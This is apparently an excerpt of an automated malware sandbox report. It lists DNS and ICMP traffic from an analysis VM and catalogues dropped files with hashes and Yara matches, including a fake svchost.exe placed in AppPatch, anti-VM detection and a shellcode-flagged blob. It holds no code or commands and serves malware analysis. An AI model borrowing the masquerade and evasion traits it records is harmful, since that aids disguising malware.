192.168.56.101 65429 114.114.114.114 53
192.168.56.101 60273 114.114.114.114 53
192.168.56.101 55841 114.114.114.114 53
192.168.56.101 62850 114.114.114.114 53
192.168.56.101 64682 114.114.114.114 53
192.168.56.101 51580 114.114.114.114 53
192.168.56.101 56001 114.114.114.114 53
192.168.56.101 64821 114.114.114.114 53
192.168.56.101 62574 114.114.114.114 53
192.168.56.101 61811 114.114.114.114 53
192.168.56.101 55801 114.114.114.114 53
192.168.56.101 59166 114.114.114.114 53
192.168.56.101 59499 114.114.114.114 53
192.168.56.101 57694 114.114.114.114 53
192.168.56.101 64262 114.114.114.114 53
192.168.56.101 55219 114.114.114.114 53
192.168.56.101 64467 114.114.114.114 53
192.168.56.101 51758 8.8.8.8 53
192.168.56.101 52215 8.8.8.8 53
192.168.56.101 57665 8.8.8.8 53
192.168.56.101 55457 8.8.8.8 53
192.168.56.101 49986 8.8.8.8 53
192.168.56.101 64558 8.8.8.8 53
192.168.56.101 55142 8.8.8.8 53
192.168.56.101 62324 8.8.8.8 53
192.168.56.101 62306 8.8.8.8 53
192.168.56.101 58005 8.8.8.8 53
192.168.56.101 62044 8.8.8.8 53
192.168.56.101 60330 8.8.8.8 53
192.168.56.101 61322 8.8.8.8 53
192.168.56.101 65527 8.8.8.8 53
192.168.56.101 50075 8.8.8.8 53
192.168.56.101 56111 8.8.8.8 53
192.168.56.101 62515 8.8.8.8 53
192.168.56.101 65012 8.8.8.8 53
192.168.56.101 53131 8.8.8.8 53
192.168.56.101 60789 8.8.8.8 53
192.168.56.101 58818 8.8.8.8 53
192.168.56.101 63148 8.8.8.8 53
192.168.56.101 60395 8.8.8.8 53
192.168.56.101 51209 8.8.8.8 53
192.168.56.101 59504 8.8.8.8 53
192.168.56.101 55773 8.8.8.8 53
192.168.56.101 61491 8.8.8.8 53
192.168.56.101 55469 8.8.8.8 53
192.168.56.101 60222 8.8.8.8 53
192.168.56.101 56992 8.8.8.8 53
192.168.56.101 51770 8.8.8.8 53
192.168.56.101 50365 8.8.8.8 53
192.168.56.101 52014 8.8.8.8 53
192.168.56.101 65496 8.8.8.8 53
192.168.56.101 49587 8.8.8.8 53
192.168.56.101 64679 8.8.8.8 53
192.168.56.101 50445 8.8.8.8 53
192.168.56.101 56171 8.8.8.8 53
192.168.56.101 53520 8.8.8.8 53
192.168.56.101 54987 8.8.8.8 53
192.168.56.101 64590 8.8.8.8 53
192.168.56.101 55219 8.8.8.8 53
192.168.56.101 59499 8.8.8.8 53
192.168.56.101 64262 8.8.8.8 53
192.168.56.101 57694 8.8.8.8 53
192.168.56.101 55801 8.8.8.8 53
192.168.56.101 62574 8.8.8.8 53
192.168.56.101 61811 8.8.8.8 53
192.168.56.101 62850 8.8.8.8 53
192.168.56.101 56001 8.8.8.8 53
192.168.56.101 51580 8.8.8.8 53
192.168.56.101 59166 8.8.8.8 53
192.168.56.101 60273 8.8.8.8 53
192.168.56.101 55841 8.8.8.8 53
192.168.56.101 65429 8.8.8.8 53
192.168.56.101 60534 8.8.8.8 53
192.168.56.101 60720 8.8.8.8 53
192.168.56.101 65312 8.8.8.8 53
192.168.56.101 64821 8.8.8.8 53
192.168.56.101 64682 8.8.8.8 53
192.168.56.101 61947 8.8.8.8 53
192.168.56.101 60516 8.8.8.8 53
192.168.56.101 54128 114.114.114.114 53
192.168.56.101 60516 114.114.114.114 53
192.168.56.101 54128 8.8.8.8 53
192.168.56.101 50591 8.8.8.8 53
192.168.56.101 58529 114.114.114.114 53
192.168.56.101 50881 8.8.8.8 53
192.168.56.101 49997 8.8.8.8 53
192.168.56.101 50591 114.114.114.114 53
192.168.56.101 61306 8.8.8.8 53
192.168.56.101 64829 8.8.8.8 53
192.168.56.101 58529 8.8.8.8 53
192.168.56.101 50881 114.114.114.114 53
192.168.56.101 49997 114.114.114.114 53
192.168.56.101 61306 114.114.114.114 53
192.168.56.101 64829 114.114.114.114 53
192.168.56.101 62149 114.114.114.114 53
192.168.56.101 62149 8.8.8.8 53
192.168.56.101 53620 8.8.8.8 53
192.168.56.101 62735 8.8.8.8 53
192.168.56.101 57151 8.8.8.8 53
192.168.56.101 61529 8.8.8.8 53
192.168.56.101 61529 114.114.114.114 53
192.168.56.101 57634 114.114.114.114 53
192.168.56.101 57270 114.114.114.114 53
192.168.56.101 58760 114.114.114.114 53
192.168.56.101 52655 114.114.114.114 53
192.168.56.101 52275 114.114.114.114 53
192.168.56.101 52877 114.114.114.114 53
192.168.56.101 64976 114.114.114.114 53
192.168.56.101 54257 114.114.114.114 53
192.168.56.101 57125 114.114.114.114 53
192.168.56.101 50746 114.114.114.114 53
192.168.56.101 60841 114.114.114.114 53
192.168.56.101 57824 114.114.114.114 53
192.168.56.101 58940 114.114.114.114 53
192.168.56.101 49461 114.114.114.114 53
192.168.56.101 62545 114.114.114.114 53
192.168.56.101 53813 114.114.114.114 53
192.168.56.101 64986 114.114.114.114 53
192.168.56.101 51570 114.114.114.114 53
192.168.56.101 59840 114.114.114.114 53
192.168.56.101 57437 114.114.114.114 53
192.168.56.101 51819 114.114.114.114 53
192.168.56.101 61851 114.114.114.114 53
192.168.56.101 64420 114.114.114.114 53
192.168.56.101 59724 114.114.114.114 53
192.168.56.101 59182 114.114.114.114 53
192.168.56.101 50590 114.114.114.114 53
192.168.56.101 51185 114.114.114.114 53
192.168.56.101 63225 114.114.114.114 53
192.168.56.101 53095 114.114.114.114 53
192.168.56.101 61758 114.114.114.114 53
192.168.56.101 64898 114.114.114.114 53
192.168.56.101 63847 114.114.114.114 53
192.168.56.101 53974 114.114.114.114 53
192.168.56.101 57584 114.114.114.114 53
192.168.56.101 56568 114.114.114.114 53
192.168.56.101 53086 114.114.114.114 53
192.168.56.101 65137 114.114.114.114 53
192.168.56.101 63885 114.114.114.114 53
192.168.56.101 50103 114.114.114.114 53
192.168.56.101 54602 114.114.114.114 53
192.168.56.101 62165 114.114.114.114 53
192.168.56.101 55759 114.114.114.114 53
192.168.56.101 56445 114.114.114.114 53
192.168.56.101 53896 114.114.114.114 53
192.168.56.101 62015 114.114.114.114 53
192.168.56.101 60398 114.114.114.114 53
192.168.56.101 54849 114.114.114.114 53
192.168.56.101 57796 114.114.114.114 53
192.168.56.101 64837 114.114.114.114 53
192.168.56.101 64660 114.114.114.114 53
192.168.56.101 62889 114.114.114.114 53
192.168.56.101 52577 114.114.114.114 53
192.168.56.101 53608 114.114.114.114 53
192.168.56.101 53307 114.114.114.114 53
192.168.56.101 59304 114.114.114.114 53
192.168.56.101 58389 114.114.114.114 53
192.168.56.101 55998 114.114.114.114 53
192.168.56.101 49325 114.114.114.114 53
192.168.56.101 62770 114.114.114.114 53
192.168.56.101 62409 114.114.114.114 53
192.168.56.101 49283 114.114.114.114 53
192.168.56.101 55999 114.114.114.114 53
192.168.56.101 61231 114.114.114.114 53
192.168.56.101 61715 114.114.114.114 53
192.168.56.101 57270 8.8.8.8 53
192.168.56.101 61851 8.8.8.8 53
192.168.56.101 51819 8.8.8.8 53
192.168.56.101 53813 8.8.8.8 53
192.168.56.101 64986 8.8.8.8 53
192.168.56.101 59840 8.8.8.8 53
192.168.56.101 49461 8.8.8.8 53
192.168.56.101 60841 8.8.8.8 53
192.168.56.101 51570 8.8.8.8 53
192.168.56.101 50746 8.8.8.8 53
192.168.56.101 57125 8.8.8.8 53
192.168.56.101 58940 8.8.8.8 53
192.168.56.101 54257 8.8.8.8 53
192.168.56.101 57824 8.8.8.8 53
192.168.56.101 62545 8.8.8.8 53
192.168.56.101 64976 8.8.8.8 53
192.168.56.101 52655 8.8.8.8 53
192.168.56.101 57437 8.8.8.8 53
192.168.56.101 56445 8.8.8.8 53
192.168.56.101 62015 8.8.8.8 53
192.168.56.101 53896 8.8.8.8 53
192.168.56.101 54602 8.8.8.8 53
192.168.56.101 60398 8.8.8.8 53
192.168.56.101 62165 8.8.8.8 53
192.168.56.101 53086 8.8.8.8 53
192.168.56.101 50103 8.8.8.8 53
192.168.56.101 64898 8.8.8.8 53
192.168.56.101 65137 8.8.8.8 53
192.168.56.101 56568 8.8.8.8 53
192.168.56.101 63225 8.8.8.8 53
192.168.56.101 63847 8.8.8.8 53
192.168.56.101 57584 8.8.8.8 53
192.168.56.101 64420 8.8.8.8 53
192.168.56.101 53095 8.8.8.8 53
192.168.56.101 51185 8.8.8.8 53
192.168.56.101 63885 8.8.8.8 53
192.168.56.101 59182 8.8.8.8 53
192.168.56.101 59724 8.8.8.8 53
192.168.56.101 53974 8.8.8.8 53
192.168.56.101 55759 8.8.8.8 53
192.168.56.101 50590 8.8.8.8 53
192.168.56.101 61758 8.8.8.8 53
192.168.56.101 55999 8.8.8.8 53
192.168.56.101 62409 8.8.8.8 53
192.168.56.101 49283 8.8.8.8 53
192.168.56.101 55998 8.8.8.8 53
192.168.56.101 61231 8.8.8.8 53
192.168.56.101 58389 8.8.8.8 53
192.168.56.101 49325 8.8.8.8 53
192.168.56.101 62770 8.8.8.8 53
192.168.56.101 53608 8.8.8.8 53
192.168.56.101 52577 8.8.8.8 53
192.168.56.101 59304 8.8.8.8 53
192.168.56.101 64837 8.8.8.8 53
192.168.56.101 57796 8.8.8.8 53
192.168.56.101 53307 8.8.8.8 53
192.168.56.101 62889 8.8.8.8 53
192.168.56.101 64660 8.8.8.8 53
192.168.56.101 54849 8.8.8.8 53
192.168.56.101 61715 8.8.8.8 53
192.168.56.101 63485 8.8.8.8 53
192.168.56.101 59476 8.8.8.8 53
192.168.56.101 54394 8.8.8.8 53
192.168.56.101 59476 114.114.114.114 53
192.168.56.101 54394 114.114.114.114 53
192.168.56.101 55319 114.114.114.114 53

HTTP & HTTPS Requests

No HTTP requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.56.101 114.114.114.114 3
192.168.56.101 8.8.8.8 3
192.168.56.101 114.114.114.114 3

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Name 5c67fb44713b6d65_computerz.set
Filepath C:\Program Files (x86)\360\360DrvMgr\ComputerZ.set
Size 488.0B
Processes 2968 (ComputerZService.exe)
Type Generic INItialization configuration [HardWareIDs]
MD5 ae8f3b8d468650ed81aa77e79818b6ea
SHA1 39e48f4b161743246e2f8735c1f834386732a7c1
SHA256 5c67fb44713b6d65c0f911048687dad1dea3c2b6f5a65533e7b87d54a0ec53c8
CRC32 EDB39C68
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 0ab7f08e0a5f1423_svchost.exe
Filepath C:\Windows\AppPatch\svchost.exe
Size 711.0KB
Processes 2064 (04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4.exe)
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 555f392ca53ab5f782aff94f12d01088
SHA1 50830d26c1deb39432570f4b16a0f5526931ea01
SHA256 0ab7f08e0a5f14232b8a51171d4f587fb4228ee75c216110939f14933d7b4fef
CRC32 44FA3D03
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
VirusTotal Search for analysis
Name e3b0c44298fc1c14_F01D.tmp
Size 0.0B
Type empty
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32 00000000
ssdeep None
Yara None matched
VirusTotal Search for analysis
Name 999a2d6833cfbbb1_ComputerZ_HardwareDll.log
Filepath C:\Program Files (x86)\360\360DrvMgr\Log\ComputerZ_HardwareDll.log
Size 127.9KB
Type Unicode text, UTF-8 text, with very long lines (596), with CRLF, LF line terminators
MD5 89827550801d5a6a7ec9e2c36499bf3f
SHA1 0d6bf89da29804c73ff58746d3796f44f4e90f92
SHA256 999a2d6833cfbbb186690c53c99544c330f9283cb1eae999e3e17ced7a957ecd
CRC32 323D85A1
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
  • embedded_win_api - A non-Windows executable contains win32 API functions names
VirusTotal Search for analysis
Name 04fd4db1c34dba0f_E8D9.tmp
Filepath C:\Users\Administrator\AppData\Local\Temp\E8D9.tmp
Size 711.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 53efb5b3154447e416573f00bf71a423
SHA1 880612b1e2ff5e478a682eaecb7411509a5141d0
SHA256 04fd4db1c34dba0f545952c8ae0948b259d7133000e7278034c9f53cf1ef08e4
CRC32 63B98BC3
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
VirusTotal Search for analysis
Name 1e2ca08c86040e48_computerz_hardwaredll.log
Filepath C:\Program Files (x86)\360\360DrvMgr\Log\ComputerZ_HardwareDll.log
Size 65.8KB
Processes 2968 (ComputerZService.exe) 1472 (dll_service.exe) 1496 (dll_service.exe) 2520 (dll_service.exe) 3036 (dll_service.exe) 696 (dll_service.exe)
Type Unicode text, UTF-8 text, with very long lines (596), with CRLF, LF line terminators
MD5 50a0f589041589f1547df6fd3373b174
SHA1 1427ef8040de5a2feac5d62a11e70313906840c7
SHA256 1e2ca08c86040e4897f33ccbdacd4a60f8a65623c9a84c510707a8d3763e76dc
CRC32 BBA56562
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
VirusTotal Search for analysis
Name 501b45da2f14fb66a5098cfaa2e35fcd0070956c
Size 327.0KB
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 279b5a7863f670d3f1566f68806d7a45
SHA1 501b45da2f14fb66a5098cfaa2e35fcd0070956c
SHA256 ab19b5e4a5ab2d1140268e112aaea46926692dd38fbb23a11c2dce5e425f821d
CRC32 7CD47E0B
ssdeep None
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
VirusTotal Search for analysis
Name e09fcbbc4e17841b7d18562c6ac7f74b0c1fb970
Size 330.5KB
Type data
MD5 e10828b1d99633018a930838db62f36a
SHA1 e09fcbbc4e17841b7d18562c6ac7f74b0c1fb970
SHA256 d5a0283bd09f120f4865c7bfcee70850de7e02cbc094d84868ef75861a6519c0
CRC32 CF3678D8
ssdeep None
Yara
  • shellcode - Matched shellcode byte patterns
  • vmdetect - Possibly employs anti-virtualization techniques
  • embedded_pe - Contains an embedded PE32 file
  • embedded_win_api - A non-Windows executable contains win32 API functions names
VirusTotal Search for analysis